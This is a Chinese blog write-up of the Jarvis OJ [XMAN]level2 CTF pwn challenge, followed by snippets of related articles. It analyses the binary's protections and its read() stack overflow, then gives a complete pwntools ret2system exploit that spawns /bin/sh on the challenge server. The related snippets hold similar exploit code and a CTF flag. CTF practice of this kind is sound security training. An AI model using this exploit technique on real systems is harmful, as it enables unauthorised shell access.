Jarvis OJ [XMAN]level2

最新推荐文章于 2024-07-11 19:14:54 发布
最新推荐文章于 2024-07-11 19:14:54 发布
阅读量334 收藏
点赞数
分类专栏: linux 溢出攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/80944144
版权

查询保护

liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
liu@liu-F117-F:~/桌面/oj/level2$

开启了NX保护

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  system("echo 'Hello World!'");
  return 0;
}

有system函数

.data:0804A024  00000008    C   /bin/sh

有/bin/sh字符串

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  system("echo Input:");
  return read(0, &buf, 0x100u);
}

这里有栈溢出漏洞。
规划:覆盖返回地址到system函数,此时的参数为/bin/sh的地址
exp:

from pwn import *
context.log_level="debug"

system_addr=0x0804845C
bin_sh=0x0804A024

#p=process("./level2")
p=remote("pwn2.jarvisoj.com",9878)
p.recvline()
payload="A"*0x88+"A"*4+p32(system_addr)+p32(bin_sh)
p.sendline(payload)
p.interactive()

普通利用栈溢出用system函数覆盖返回地址,用/bin/sh的地址来覆盖参数

九层台
关注
专栏目录
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1442
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
jarvisoj-level2
qq_35661990的博客
11-09 1382
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj_level3_x64解题
最新发布
2301_81504456的博客
07-11 384
X64系统中程序参数前六个保存在寄存器中。
Jarvis oj level2 wp
ditto的博客
12-30 1208
检查防护 开启了NX,没开启PIE和canary防护,程序本身的基址不变。 放IDA里看一下 程序本身调用了system函数,那么PLT表里就一定有这个函数。 看下vulner函数 很显然栈溢出。 IDA查找下字符串: 发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。 简单计算下,首地址是0x0804A024, 算下溢出点是多...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1080
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
jarvisoj_level2
m0sway的博客
03-20 902
jarvisoj_level2 WriteUP BUU_PWN
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 382
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 301
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
Jarvis OJ level1
Kni9hT's Blog
11-08 594
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
大智慧全推精简,更新2018最新全推送IP,速度快.稳定
05-07
大智慧精简,全推送,股票池,速度超快,更新2018IP,云主机挂股票池最佳版本
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 199
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 284
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 682
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
[JarvisOj][XMAN]level2
weixin_34088838的博客
07-29 85
老套路 checksec ida查看 覆盖掉 之后system地址再返回覆盖 最后/bin/sh地址 # -*- coding:utf-8 -*- from pwn import * sh = remote('pwn2.jarvisoj.com', 9878) # remote junk = 'a' * 0x88 fakebp...
Jarvis oj level2 (x64) wp
ditto的博客
01-05 294
64位程序前6个参数通过寄存器来传递,多于6个的使用堆栈传递。前6个从左到右依次为RDI,RSI,RDX,RCX,R8,R9。多于六个的从右往左依次压入堆栈 拿到题目检查保护: 放ida里,还是之前一样的程序: 程序本身有字符串/bin/sh 找下pop rdi ret 在哪: 编写exp: from pwn import* a=remote("pwn2.jarvisoj.com",...
jarvisoj——[XMAN]level2
王嘟嘟的博客
07-16 295
题目 Wp 查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。 ida看一下 常规的调用,然后看vulnerable_function函数 很明显的read缓存区溢出,溢出大小为0x88 很好玩的是这个题中有/bin/sh,地址为0x0804A024 最后溢出结果就是 0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数 那么最后脚本就是: from pwn import * sh=remote("pwn2.jarvisoj.co
[Jarvis OJ - PWN]——[XMAN]level2
Y_peak的博客
02-01 211
[Jarvis OJ - PWN]——[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下。32位并且没有开启PIE 在IDA中查看一下。main函数里面没有我们想要的,点开vulnerable_function函数。发现read函数,第一个参数为0,代表标准输入。可以利用栈溢出。 发现里面有system函数,但是里面的参数不是我们想要的,所以我们要覆盖一下它。按shift + F12,找到/bin/sh字符串
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值